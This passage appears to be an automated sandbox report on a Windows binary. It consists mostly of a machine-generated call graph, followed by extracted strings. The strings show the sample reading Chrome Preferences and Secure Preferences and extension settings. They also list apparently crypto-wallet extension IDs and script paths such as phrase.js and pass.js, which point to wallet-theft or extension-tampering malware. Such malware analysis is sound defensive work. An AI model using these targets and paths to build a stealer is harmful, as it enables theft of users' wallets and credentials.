calls 44041->44042 44043 7ff684582a95 44042->44043 44044 7ff68457ee10 50 API calls 44043->44044 44045 7ff684582aa6 44044->44045 44046 7ff68457ee10 50 API calls 44045->44046 44047 7ff684582ab7 44046->44047 44048 7ff68457ee10 50 API calls 44047->44048 44049 7ff684582acb 44048->44049 44050 7ff68457ec10 50 API calls 44049->44050 44051 7ff684582adf 44050->44051 44052 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44051->44052 44053 7ff684582af3 44052->44053 44054 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44053->44054 44055 7ff684582b20 44054->44055 44056 7ff68457ec10 50 API calls 44055->44056 44057 7ff684582b34 44056->44057 44058 7ff68457ec10 50 API calls 44057->44058 44059 7ff684582b48 44058->44059 44060 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44059->44060 44061 7ff684582b8f 44060->44061 44062 7ff68457ee10 50 API calls 44061->44062 44063 7ff684582994 44062->44063 44063->42625 44065 7ff68457eea8 44064->44065 44066 7ff68457ee4e 44064->44066 44067 7ff6845a2770 codecvt 8 API calls 44065->44067 44074 7ff684585e60 50 API calls 3 library calls 44066->44074 44069 7ff68457eebc 44067->44069 44069->44026 44070 7ff68457ee53 44071 7ff68457ee9d 44070->44071 44073 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44070->44073 44075 7ff6845846a0 47 API calls 2 library calls 44071->44075 44073->44070 44074->44070 44075->44065 44077->42649 44078->42657 44079->42760 44086 7ff68459ea08 QueryPerformanceFrequency 44081->44086 44083 7ff6845639e2 44087 7ff68459e9ec QueryPerformanceCounter 44083->44087 44085 7ff6845639ea 44085->42801 44086->44083 44087->44085 44141 7ff6845b1824 44088->44141 44091 7ff684567cf3 44093 7ff684563ab0 44091->44093 44092 7ff68459e0c6 AreFileApisANSI 44092->44091 44094 7ff684563bda 44093->44094 44095 7ff684563b04 44093->44095 44108 7ff6845655a0 44094->44108 44096 7ff684563c00 44095->44096 44151 7ff68459e0dc MultiByteToWideChar GetLastError 44095->44151 44155 7ff684562800 50 API calls 2 library calls 44096->44155 44099 7ff684563c06 44156 7ff684562b80 50 API calls Concurrency::cancel_current_task 44099->44156 44101 7ff684563b2a 44101->44099 44104 7ff684563b45 44101->44104 44152 7ff684584730 50 API calls 6 library calls 44101->44152 44153 7ff68459e0dc MultiByteToWideChar GetLastError 44104->44153 44106 7ff684563bcf 44106->44094 44154 7ff684562b80 50 API calls Concurrency::cancel_current_task 44106->44154 44109 7ff6845655d1 44108->44109 44157 7ff68459e440 44109->44157 44112 7ff6845a2770 codecvt 8 API calls 44113 7ff684565672 44112->44113 44113->42830 44113->42840 44115 7ff684564ebf 44114->44115 44119 7ff684564e57 44114->44119 44117 7ff68459e440 66 API calls 44115->44117 44116 7ff6845a2770 codecvt 8 API calls 44118 7ff684564f6d 44116->44118 44117->44119 44118->42893 44119->44116 44125 7ff684564fb0 44120->44125 44122 7ff684564ff4 44123 7ff6845a2770 codecvt 8 API calls 44122->44123 44126 7ff684565046 44123->44126 44124 7ff684564fe7 44209 7ff684565270 50 API calls 2 library calls 44124->44209 44125->44122 44125->44124 44206 7ff68459e38c FindNextFileW 44125->44206 44126->42893 44128->42893 44129->42893 44130->42848 44131->42847 44133 7ff684564d69 44132->44133 44134 7ff68457f4a0 50 API calls 44133->44134 44135 7ff684564d7e 44134->44135 44210 7ff684564660 44135->44210 44137 7ff684564da0 44220 7ff6845a49c0 RtlPcToFileHeader RaiseException 44137->44220 44139 7ff684564db1 44142 7ff6845b6f84 _Getctype 47 API calls 44141->44142 44143 7ff6845b182d 44142->44143 44146 7ff6845b9788 44143->44146 44147 7ff6845b979d 44146->44147 44149 7ff68459e0bd 44146->44149 44147->44149 44150 7ff6845c348c 47 API calls 3 library calls 44147->44150 44149->44091 44149->44092 44150->44149 44151->44101 44152->44104 44153->44106 44155->44099 44158 7ff68459e482 44157->44158 44160 7ff68459e548 44158->44160 44163 7ff68459e4e3 GetFileAttributesExW 44158->44163 44171 7ff68459e48b 44158->44171 44159 7ff6845a2770 codecvt 8 API calls 44161 7ff6845655ed 44159->44161 44160->44171 44199 7ff68459e770 CreateFileW 44160->44199 44161->44112 44163->44160 44165 7ff68459e4f7 GetLastError 44163->44165 44168 7ff68459e506 FindFirstFileW 44165->44168 44165->44171 44166 7ff68459e5e6 44173 7ff68459e693 44166->44173 44174 7ff68459e5f5 GetFileInformationByHandleEx 44166->44174 44167 7ff68459e5c6 44167->44171 44172 7ff68459e5d1 CloseHandle 44167->44172 44169 7ff68459e525 FindClose 44168->44169 44170 7ff68459e51a GetLastError 44168->44170 44169->44160 44170->44171 44171->44159 44172->44171 44175 7ff68459e755 44172->44175 44176 7ff68459e6ae GetFileInformationByHandleEx 44173->44176 44177 7ff68459e6e8 44173->44177 44178 7ff68459e60f GetLastError 44174->44178 44179 7ff68459e635 44174->44179 44202 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44175->44202 44176->44177 44183 7ff68459e6c4 GetLastError 44176->44183 44180 7ff68459e6ff 44177->44180 44181 7ff68459e73b 44177->44181 44178->44171 44184 7ff68459e61d CloseHandle 44178->44184 44179->44173 44187 7ff68459e656 GetFileInformationByHandleEx 44179->44187 44180->44171 44186 7ff68459e705 CloseHandle 44180->44186 44181->44171 44188 7ff68459e741 CloseHandle 44181->44188 44183->44171 44190 7ff68459e6d6 CloseHandle 44183->44190 44184->44171 44185 7ff68459e766 44184->44185 44205 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44185->44205 44186->44171 44186->44175 44187->44173 44192 7ff68459e672 GetLastError 44187->44192 44188->44171 44188->44175 44189 7ff68459e75a 44203 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44189->44203 44193 7ff68459e760 44190->44193 44194 7ff68459e691 44190->44194 44192->44171 44197 7ff68459e680 CloseHandle 44192->44197 44204 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44193->44204 44194->44171 44197->44189 44197->44194 44200 7ff68459e7b2 GetLastError 44199->44200 44201 7ff68459e5c0 44199->44201 44200->44201 44201->44166 44201->44167 44207 7ff68459e3a1 GetLastError 44206->44207 44208 7ff68459e39a 44206->44208 44208->44125 44209->44122 44221 7ff684562590 44210->44221 44212 7ff684564688 44237 7ff68457f080 44212->44237 44214 7ff68456469f 44251 7ff684564790 51 API calls 6 library calls 44214->44251 44216 7ff68456475c Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44216->44137 44217 7ff684564722 44217->44216 44218 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44217->44218 44219 7ff684564771 44218->44219 44219->44137 44220->44139 44222 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44221->44222 44223 7ff6845625bb 44222->44223 44224 7ff6845625e2 44223->44224 44225 7ff6845808c0 std::_Throw_Cpp_error 50 API calls 44223->44225 44252 7ff684562a30 44224->44252 44225->44224 44227 7ff6845808c0 std::_Throw_Cpp_error 50 API calls 44228 7ff68456261f Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44227->44228 44230 7ff684562701 44228->44230 44259 7ff684562430 48 API calls 2 library calls 44228->44259 44232 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44230->44232 44231 7ff6845626d3 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44231->44212 44235 7ff684562707 __std_exception_destroy Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44232->44235 44233 7ff68456269f 44233->44231 44234 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44233->44234 44234->44230 44235->44212 44241 7ff68457f0ae 44237->44241 44238 7ff68457f1a3 44265 7ff684562410 50 API calls std::_Throw_Cpp_error 44238->44265 44241->44238 44242 7ff68457f19d 44241->44242 44244 7ff68457f0ca codecvt 44241->44244 44245 7ff68457f13d 44241->44245 44246 7ff68457f164 44241->44246 44264 7ff684562370 50 API calls 2 library calls 44242->44264 44244->44214 44245->44242 44248 7ff6845a2a38 std::_Facet_Register 50 API calls 44245->44248 44247 7ff6845a2a38 std::_Facet_Register 50 API calls 44246->44247 44247->44244 44249 7ff68457f14e 44248->44249 44249->44244 44250 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44249->44250 44250->44242 44251->44217 44260 7ff68459df9c GetLocaleInfoEx 44252->44260 44255 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 44256 7ff684562a9c LocalFree 44255->44256 44257 7ff6845a2770 codecvt 8 API calls 44256->44257 44258 7ff684562600 44257->44258 44258->44227 44259->44233 44261 7ff68459dfcc FormatMessageA 44260->44261 44263 7ff684562a65 44261->44263 44263->44255 44264->44238 44267 7ff68457ffda 44266->44267 44268 7ff68458002a 44266->44268 44323 7ff68457fdd0 44267->44323 44268->43026 44270 7ff684580014 44333 7ff6845a8fe0 44270->44333 44381 7ff68459e3ac 44272->44381 44275 7ff6845887f6 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44275->43026 44276 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44277 7ff68458881b 44276->44277 44277->43026 44279 7ff684587b60 44278->44279 44284 7ff6845878ed 44278->44284 44404 7ff6845862a0 50 API calls 2 library calls 44279->44404 44280 7ff684587923 44285 7ff6845a2a38 std::_Facet_Register 50 API calls 44280->44285 44282 7ff684587b5b 44403 7ff684562370 50 API calls 2 library calls 44282->44403 44283 7ff684587b66 44289 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44283->44289 44284->44280 44284->44282 44287 7ff684587999 44284->44287 44288 7ff684587970 44284->44288 44293 7ff68458795d 44284->44293 44285->44293 44291 7ff6845a2a38 std::_Facet_Register 50 API calls 44287->44291 44288->44280 44288->44282 44290 7ff684587b6c 44289->44290 44291->44293 44293->44283 44388 7ff684588ff0 44293->44388 44307->43026 44308->43026 44309->43026 44310->43026 44311->43026 44318->42976 44321->43014 44322->42965 44324 7ff68457fdf3 44323->44324 44325 7ff68457fea2 44323->44325 44324->44325 44331 7ff68457fdfd 44324->44331 44326 7ff6845a2770 codecvt 8 API calls 44325->44326 44327 7ff68457feb1 44326->44327 44327->44270 44328 7ff68457fe41 44329 7ff6845a2770 codecvt 8 API calls 44328->44329 44330 7ff68457fe5e 44329->44330 44330->44270 44331->44328 44341 7ff6845a9c48 44331->44341 44334 7ff6845a9010 44333->44334 44342 7ff6845a9c78 44341->44342 44349 7ff6845a9998 44342->44349 44350 7ff6845a99e5 44349->44350 44351 7ff6845a99b8 44349->44351 44351->44350 44382 7ff6845887c2 44381->44382 44383 7ff68459e3b6 FindClose 44381->44383 44382->44275 44382->44276 44383->44382 44384 7ff68459e3c5 44383->44384 44387 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44384->44387 44389 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44388->44389 44390 7ff68458900a 44389->44390 44391 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44390->44391 44392 7ff684589018 44391->44392 44393 7ff68457ee10 50 API calls 44392->44393 44403->44279 44404->44283 44422->43043 44424 7ff684588b22 44423->44424 44434 7ff684588bae 44423->44434 44425 7ff6845a2a38 std::_Facet_Register 50 API calls 44424->44425 44426 7ff684588b3a 44425->44426 44427 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44426->44427 44428 7ff684588b57 44427->44428 44429 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44428->44429 44430 7ff684588b65 44429->44430 44431 7ff684588af0 50 API calls 44430->44431 44432 7ff684588b9c 44431->44432 44433 7ff684588af0 50 API calls 44432->44433 44433->44434 44434->43049 44436 7ff6845656d5 44435->44436 44443 7ff6845656b9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44435->44443 44441 7ff68456570f 44436->44441 44526 7ff684583b40 50 API calls 6 library calls 44436->44526 44438 7ff6845a2770 codecvt 8 API calls 44439 7ff6845658c2 44438->44439 44439->43093 44516 7ff68457efc0 44441->44516 44442 7ff684565856 44442->44443 44444 7ff6845658db 44442->44444 44443->44438 44445 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44444->44445 44446 7ff6845658e0 44445->44446 44447 7ff6845657a9 44447->44442 44448 7ff68457efc0 50 API calls 44447->44448 44521 7ff68459e314 CreateDirectoryW 44447->44521 44448->44447 44450->43073 44451->43150 44452->43150 44453->43150 44455 7ff684580717 44454->44455 44460 7ff6845806ed codecvt 44454->44460 44456 7ff684580819 44455->44456 44462 7ff68458072a 44455->44462 44528 7ff684562410 50 API calls std::_Throw_Cpp_error 44456->44528 44458 7ff68458077e 44461 7ff6845a2a38 std::_Facet_Register 50 API calls 44458->44461 44459 7ff68458081e 44529 7ff684562370 50 API calls 2 library calls 44459->44529 44460->43150 44469 7ff684580763 codecvt 44461->44469 44462->44458 44463 7ff6845807ad 44462->44463 44464 7ff684580771 44462->44464 44462->44469 44466 7ff6845a2a38 std::_Facet_Register 50 API calls 44463->44466 44464->44458 44464->44459 44466->44469 44467 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 44468 7ff68458082a 44467->44468 44469->44467 44470 7ff6845807fb Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44469->44470 44470->43150 44471->43150 44473 7ff68459e770 __std_fs_open_handle 2 API calls 44472->44473 44474 7ff68459e80d 44473->44474 44475 7ff68459e813 44474->44475 44477 7ff68459e770 __std_fs_open_handle 2 API calls 44474->44477 44485 7ff68459e9bb 44474->44485 44476 7ff68459e816 SetFileInformationByHandle 44475->44476 44486 7ff68459e83c 44475->44486 44478 7ff68459e8b8 GetLastError 44476->44478 44476->44486 44477->44475 44479 7ff68459e8c5 44478->44479 44479->44486 44530 7ff68459e03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44479->44530 44481 7ff68459e892 44484 7ff6845a2770 codecvt 8 API calls 44481->44484 44482 7ff68459e849 44483 7ff68459e884 CloseHandle 44482->44483 44483->44481 44483->44485 44488 7ff68459e8a2 44484->44488 44532 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 44485->44532 44486->44481 44486->44482 44486->44483 44487 7ff68459e8e3 44487->44486 44491 7ff68459e8f5 GetFileInformationByHandleEx 44487->44491 44488->43150 44490 7ff68459e9e2 44492 7ff68459e90e 44491->44492 44493 7ff68459e93b 44491->44493 44495 7ff68459e912 GetLastError 44492->44495 44496 7ff68459e942 SetFileInformationByHandle 44493->44496 44503 7ff68459e91b 44493->44503 44495->44503 44496->44492 44498 7ff68459e95e 44496->44498 44531 7ff68459e03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44498->44531 44499 7ff68459e925 CloseHandle 44499->44490 44501 7ff68459e936 44499->44501 44501->44481 44503->44481 44503->44499 44508->43102 44509->43129 44517 7ff68457f023 44516->44517 44518 7ff68457efdf codecvt 44516->44518 44527 7ff684583fa0 50 API calls 6 library calls 44517->44527 44518->44447 44520 7ff68457f039 44520->44447 44522 7ff68459e339 GetLastError 44521->44522 44523 7ff68459e32d 44521->44523 44522->44523 44524 7ff68459e34a 44522->44524 44523->44447 44525 7ff68459e440 66 API calls 44524->44525 44525->44523 44526->44441 44527->44520 44529->44469 44530->44487 44534->43155 44535->43170 45005 7ff68456a870 45004->45005 45006 7ff68459e0b4 __std_fs_code_page 48 API calls 45005->45006 45007 7ff68456a888 45006->45007 45008 7ff684563ab0 52 API calls 45007->45008 45009 7ff68456a8ad 45008->45009 45010 7ff68456a8db 45009->45010 45011 7ff68456ac76 45009->45011 45013 7ff68456ac89 45010->45013 45032 7ff68456a918 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45010->45032 45012 7ff684564d50 54 API calls 45011->45012 45012->45013 45014 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45013->45014 45015 7ff68456ac8f 45014->45015 45017 7ff684564d50 54 API calls 45015->45017 45016 7ff6845655a0 66 API calls 45016->45032 45018 7ff68456ac9f 45017->45018 45020 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45018->45020 45019 7ff68456abb5 45021 7ff6845a2770 codecvt 8 API calls 45019->45021 45023 7ff68456aca5 45020->45023 45024 7ff68456ac59 45021->45024 45022 7ff684564f80 52 API calls 45022->45032 45026 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45023->45026 45025 7ff68456acab 45064 7ff684564c60 53 API calls 3 library calls 45025->45064 45026->45025 45028 7ff684584160 50 API calls 45028->45032 45031 7ff68456acb3 std::_Locinfo::_Locinfo_ctor 45032->45015 45032->45016 45032->45018 45032->45019 45032->45022 45032->45023 45032->45025 45032->45028 45046 7ff684563f60 45032->45046 45063 7ff684587d80 50 API calls 4 library calls 45032->45063 45047 7ff684563f8a 45046->45047 45048 7ff68459e0b4 __std_fs_code_page 48 API calls 45047->45048 45063->45032 45064->45031 45403->43891 45405->43910 45416 7ff68457d200 45417 7ff68457d25d 45416->45417 45421 7ff68457d337 45416->45421 45427 7ff684580b20 45417->45427 45419 7ff68457d284 45423 7ff68457d2b4 45419->45423 45437 7ff68457db30 45419->45437 45420 7ff68457d30d 45447 7ff6845a49c0 RtlPcToFileHeader RaiseException 45421->45447 45423->45420 45448 7ff6845a49c0 RtlPcToFileHeader RaiseException 45423->45448 45425 7ff68457d3e6 45428 7ff684580b7f 45427->45428 45432 7ff684580b4a 45427->45432 45430 7ff684581160 10 API calls 45428->45430 45434 7ff684580b8d 45428->45434 45429 7ff684580b6e 45429->45419 45430->45434 45431 7ff684580d12 45431->45419 45432->45429 45449 7ff6845a49c0 RtlPcToFileHeader RaiseException 45432->45449 45434->45431 45450 7ff6845a49c0 RtlPcToFileHeader RaiseException 45434->45450 45436 7ff684580dd3 45438 7ff68457db63 45437->45438 45439 7ff68457fdd0 78 API calls 45438->45439 45446 7ff68457dbbb 45438->45446 45441 7ff68457db86 45439->45441 45440 7ff6845a2770 codecvt 8 API calls 45442 7ff68457dc29 45440->45442 45443 7ff6845ac858 75 API calls 45441->45443 45444 7ff68457dba6 45441->45444 45441->45446 45442->45423 45443->45444 45444->45446 45451 7ff6845abe50 45444->45451 45446->45440 45447->45423 45448->45425 45449->45434 45450->45436 45452 7ff6845abe64 45451->45452 45453 7ff6845abe79 45451->45453 45460 7ff6845b1674 11 API calls _get_daylight 45452->45460 45453->45452 45455 7ff6845abe7e 45453->45455 45457 7ff6845adb84 50 API calls 45455->45457 45456 7ff6845abe69 45461 7ff6845acd10 47 API calls _invalid_parameter_noinfo_noreturn 45456->45461 45459 7ff6845abe74 45457->45459 45459->45446 45460->45456 45461->45459 45462 7ff68457d3f0 45463 7ff68457d436 45462->45463 45464 7ff684580b20 10 API calls 45463->45464 45465 7ff68457d447 45464->45465 45467 7ff68457d46c 45465->45467 45471 7ff68457dd80 45465->45471 45466 7ff68457d4bc 45467->45466 45478 7ff6845a49c0 RtlPcToFileHeader RaiseException 45467->45478 45469 7ff68457d53e 45472 7ff68457dd98 45471->45472 45473 7ff68457dda4 codecvt 45471->45473 45472->45467 45474 7ff68457ddb5 codecvt 45473->45474 45475 7ff68457deee 45473->45475 45476 7ff6845ac520 _fread_nolock 63 API calls 45473->45476 45474->45467 45475->45474 45477 7ff6845ac520 _fread_nolock 63 API calls 45475->45477 45476->45473 45477->45474 45478->45469 45479 7ff6845bc06c 45480 7ff6845bc09c 45479->45480 45487 7ff6845bbea0 45480->45487 45483 7ff6845bc0db 45485 7ff6845bc0f0 45483->45485 45499 7ff6845a89b4 47 API calls 2 library calls 45483->45499 45488 7ff6845bbef7 45487->45488 45497 7ff6845bbec9 45487->45497 45489 7ff6845bbf10 45488->45489 45491 7ff6845bbf67 45488->45491 45501 7ff6845acc44 47 API calls _invalid_parameter_noinfo_noreturn 45489->45501 45500 7ff6845bc5d4 EnterCriticalSection 45491->45500 45497->45483 45498 7ff6845a89b4 47 API calls 2 library calls 45497->45498 45498->45483 45499->45485 45501->45497 45502 7ff684586930 45503 7ff684586b6e 45502->45503 45508 7ff68458698a 45502->45508 45539 7ff6845862a0 50 API calls 2 library calls 45503->45539 45505 7ff684586b69 45538 7ff684562370 50 API calls 2 library calls 45505->45538 45506 7ff684586a62 45509 7ff6845a93f8 __GSHandlerCheck_EH 47 API calls 45506->45509 45513 7ff684586b0f 45506->45513 45520 7ff684586b38 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45506->45520 45508->45505 45510 7ff6845869e8 45508->45510 45511 7ff684586a11 45508->45511 45516 7ff6845869d6 45508->45516 45509->45513 45510->45505 45515 7ff6845869f5 45510->45515 45512 7ff6845a2a38 std::_Facet_Register 50 API calls 45511->45512 45512->45516 45518 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45513->45518 45513->45520 45517 7ff6845a2a38 std::_Facet_Register 50 API calls 45515->45517 45516->45513 45521 7ff684588870 45516->45521 45517->45516 45519 7ff684586b80 45518->45519 45522 7ff6845a2a38 std::_Facet_Register 50 API calls 45521->45522 45523 7ff6845888b2 45522->45523 45524 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 45523->45524 45525 7ff6845888d4 45524->45525 45526 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 45525->45526 45527 7ff6845888e1 45526->45527 45528 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 45527->45528 45529 7ff6845888ee 45528->45529 45540 7ff6845a91b0 45529->45540 45532 7ff68458892b 45534 7ff6845a2770 codecvt 8 API calls 45532->45534 45533 7ff68458894c 45558 7ff68459ecb0 53 API calls 2 library calls 45533->45558 45536 7ff684588938 45534->45536 45536->45506 45538->45503 45539->45506 45541 7ff6845a91d0 45540->45541 45542 7ff6845a91e7 45540->45542 45566 7ff6845b1674 11 API calls _get_daylight 45541->45566 45559 7ff6845a914c 45542->45559 45546 7ff6845a91d5 45567 7ff6845acd10 47 API calls _invalid_parameter_noinfo_noreturn 45546->45567 45548 7ff684588923 45548->45532 45548->45533 45549 7ff6845a91fa CreateThread 45549->45548 45550 7ff6845a922a GetLastError 45549->45550 45568 7ff6845b15e8 11 API calls 2 library calls 45550->45568 45552 7ff6845a9237 45553 7ff6845a9240 CloseHandle 45552->45553 45554 7ff6845a9246 45552->45554 45553->45554 45555 7ff6845a924f FreeLibrary 45554->45555 45556 7ff6845a9255 45554->45556 45555->45556 45557 7ff6845b8340 __free_lconv_num 11 API calls 45556->45557 45557->45548 45560 7ff6845b87c4 _get_daylight 11 API calls 45559->45560 45561 7ff6845a916e 45560->45561 45562 7ff6845b8340 __free_lconv_num 11 API calls 45561->45562 45563 7ff6845a9178 45562->45563 45564 7ff6845a9181 GetModuleHandleExW 45563->45564 45565 7ff6845a917d 45563->45565 45564->45565 45565->45548 45565->45549 45566->45546 45567->45548 45568->45552 45569 7ff6845800c0 45570 7ff684581370 58 API calls 45569->45570 45571 7ff684580188 45570->45571 45572 7ff684581080 58 API calls 45571->45572 45573 7ff6845801ba 45572->45573 45579 7ff684580f70 45573->45579 45575 7ff684580262 45576 7ff684580234 45576->45575 45588 7ff6845a49c0 RtlPcToFileHeader RaiseException 45576->45588 45578 7ff6845802c4 45580 7ff684581069 45579->45580 45581 7ff684580f91 45579->45581 45580->45576 45589 7ff6845a0c1c 45581->45589 45585 7ff684580fbb 45596 7ff684583430 86 API calls 5 library calls 45585->45596 45587 7ff684580fd9 45587->45576 45588->45578 45591 7ff6845a0c62 45589->45591 45590 7ff684580fa1 45590->45580 45595 7ff68457fec0 47 API calls codecvt 45590->45595 45591->45590 45597 7ff6845ac8f0 75 API calls ProcessCodePage 45591->45597 45593 7ff6845a0cb0 45593->45590 45594 7ff6845a8fe0 76 API calls 45593->45594 45594->45590 45595->45585 45596->45587 45597->45593 45598 7ff684565060 45599 7ff684565094 45598->45599 45600 7ff684565226 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45599->45600 45602 7ff68457f080 50 API calls 45599->45602 45601 7ff6845a2770 codecvt 8 API calls 45600->45601 45603 7ff684565244 45601->45603 45604 7ff6845650ca 45602->45604 45605 7ff684584160 50 API calls 45604->45605 45606 7ff6845650fc 45605->45606 45607 7ff684563d40 50 API calls 45606->45607 45608 7ff68456510a Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45607->45608 45620 7ff68456525d 45608->45620 45621 7ff68459e3cc 45608->45621 45611 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45614 7ff684565263 45611->45614 45612 7ff68456516b 45616 7ff68459e38c 2 API calls 45612->45616 45617 7ff68456519e 45612->45617 45613 7ff6845651a4 45615 7ff6845655a0 66 API calls 45613->45615 45613->45617 45615->45617 45616->45612 45617->45600 45618 7ff684565258 45617->45618 45619 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 45618->45619 45619->45620 45620->45611 45622 7ff68459e3f7 FindFirstFileExW 45621->45622 45623 7ff68459e3ea FindClose 45621->45623 45625 7ff684565165 45622->45625 45626 7ff68459e422 GetLastError 45622->45626 45623->45622 45624 7ff68459e438 45623->45624 45629 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 45624->45629 45625->45612 45625->45613 45626->45625
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                                                                                                                                          • String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Q]1y$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
                                                                                                                                                                                                                                                                                          • API String ID: 1036029176-1239843877
                                                                                                                                                                                                                                                                                          • Opcode ID: 08ec73f9bdbbd47800101681472aaa64930d19fbe39ed722f6622a5bd8c198fe
                                                                                                                                                                                                                                                                                          • Instruction ID: 848374c199c323296f4b9a51c1303c21b329193749893f3fc2776ca862302b48
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08ec73f9bdbbd47800101681472aaa64930d19fbe39ed722f6622a5bd8c198fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA237262A1CBC2C2EA21DB14E4D43EE6365FF85B84F44813ADA8D87A99EF7CD544C701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: Directories found:$Q]1y$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                                                                                                                                          • API String ID: 4261731725-2835809304
                                                                                                                                                                                                                                                                                          • Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                                                                                                                                          • Instruction ID: a09ac5d0e07f5ed33765ebecbf742f9828c66a17680ac72ba50dac5712f6ba93
